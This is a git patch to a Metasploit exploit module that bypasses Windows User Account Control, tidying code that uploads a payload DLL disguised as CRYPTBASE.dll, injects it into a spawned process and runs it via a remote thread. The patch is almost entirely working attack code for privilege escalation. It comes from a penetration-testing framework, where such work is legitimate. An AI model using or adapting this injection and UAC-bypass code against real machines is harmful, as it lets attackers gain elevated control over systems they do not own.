From 6687ef80ee3092f1f4d5dbbaeccd5dce0924e5de Mon Sep 17 00:00:00 2001 From: Meatballs Date: Tue, 25 Feb 2014 22:03:01 +0000 Subject: [PATCH] Further bypassuac tidies Dont rescue Exception Use ReflectiveDLLInjection post mixin Dont keep retrieving %TEMP% path --- .../windows/local/bypassuac_injection.rb | 43 +++++-------------- 1 file changed, 11 insertions(+), 32 deletions(-) diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 0c1a0a42ce..af19569349 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Local include Exploit::EXE include Post::File include Post::Windows::Priv + include Post::Windows::ReflectiveDLLInjection def initialize(info={}) super( update_info( info, @@ -124,14 +125,13 @@ class Metasploit3 < Msf::Exploit::Local check_permissions! + @temp_path = expand_path('%TEMP%').strip + upload_payload_dll! - dll = '' - File.open(bypass_dll_path, "rb" ) { |f| dll += f.read(f.stat.size) } - offset = get_reflective_dll_offset(dll) - pid = spawn_inject_proc - run_injection(pid, offset, dll) + + run_injection(pid, bypass_dll_path) # delete the uac bypass payload vprint_status("Cleaning up payload file...") @@ -139,23 +139,8 @@ class Metasploit3 < Msf::Exploit::Local end - - def get_reflective_dll_offset(dll) - pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - - pe.exports.entries.each do |entry| - if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) - return pe.rva_to_file_offset( entry.rva ) - end - end - - raise "Can't find an exported ReflectiveLoader function!" - end - - - - def payload_filepath - "#{expand_path("%TEMP%").strip}\\CRYPTBASE.dll" + def payload_filepath(temp_path) + "#{@temp_path}\\CRYPTBASE.dll" end @@ -174,20 +159,14 @@ class Metasploit3 < Msf::Exploit::Local - def run_injection(pid, offset, dll) + def run_injection(pid, dll_path) vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") begin vprint_status("Opening process #{pid}") host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) - vprint_status("Allocating memory in procees #{pid}") - mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) - # Ensure memory is set for execution - host_process.memory.protect(mem) - vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{dll.length} bytes") - vprint_status("Writing the payload into memory") - host_process.memory.write(mem, dll) + exploit_mem, offset = inject_dll_into_process(host_process, dll_path) vprint_status("Executing payload") - thread = host_process.thread.create(mem+offset, 0) + thread = host_process.thread.create(exploit_mem + offset, 0) print_good("Successfully injected payload in to process: #{pid}") client.railgun.kernel32.WaitForSingleObject(thread.handle,3000) rescue Rex::Post::Meterpreter::RequestError => e @@ -219,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Local begin vprint_status("Payload DLL #{payload.length} bytes long being uploaded..") write_file(payload_filepath, payload) - rescue ::Exception => e + rescue Rex::Post::Meterpreter::RequestError => e fail_with( Exploit::Exception::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}"